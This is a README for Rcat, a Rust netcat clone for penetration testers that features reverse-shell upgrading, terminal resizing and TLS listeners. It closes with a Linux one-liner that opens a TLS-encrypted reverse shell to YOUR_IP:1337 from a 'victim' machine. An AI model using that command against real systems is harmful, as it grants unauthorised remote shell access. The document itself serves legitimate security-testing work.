Rcat is a modern netcat written in Rust, packed with features for hackers.
Here we listen on port tcp:9001, and receive an HTTP request made with curl.
We provide binaries for:
- Linux amd64
- Linux arm64
- Windows (amd64)
- Mac OS (arm64)
git clone [email protected]:0xfalafel/rcat.git
cargo install --path .Rcat keeps a syntax similar to netcat. You already know how to use it.
-lto listen.-ufor udp.
Rcat can upgrade your shells with the --pwn option.
With an upgraded shell, you can use shortcuts like Ctrl + C, clear the terminal with clear or Ctrl + L, etc. It's like having an SSH connection.
There is no need to type 7 commands each time you obtain a reverse shell.
Here the commands
stty rows 22 cols 65andexport TERM=xterm-256colorsare typed automatically when the connection is received.
Windows is also supported by the shell upgrade feature.
Unless you use the -R option, the remote terminal will automatically be resized when you change the size of your terminal.
(Rcat sends a SIGTSTP, resizes the terminal with the
sttycommand then usesfgto restore the application running.)
In this clip we run
htopon the victim machine, and the reverse shell is automatically resized.
Support of TLS with -t or --tls.
Here we do an HTTPS request. We use -t to establish a TLS connection, and -c to replace newlines (\n) with CRLF newlines (\r\n) as required by the HTTP protocol.
With TLS support, let's see how we can do an TLS encrypted reverse shell. Without installing any new tools on the victim.
If you have a signed certificate (with let's encrypt for example), you can use the --key and --cert options to use it.
But for now let's use a self-signed certificate:
> rcat -l 1337 --self-signed
Listening on 0.0.0.0:1337 (tcp/tls) with a self-signed certificateOn a linux target, you can use the following command to connect to your listener.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1| openssl s_client -connect YOUR_IP:1337 >/tmp/f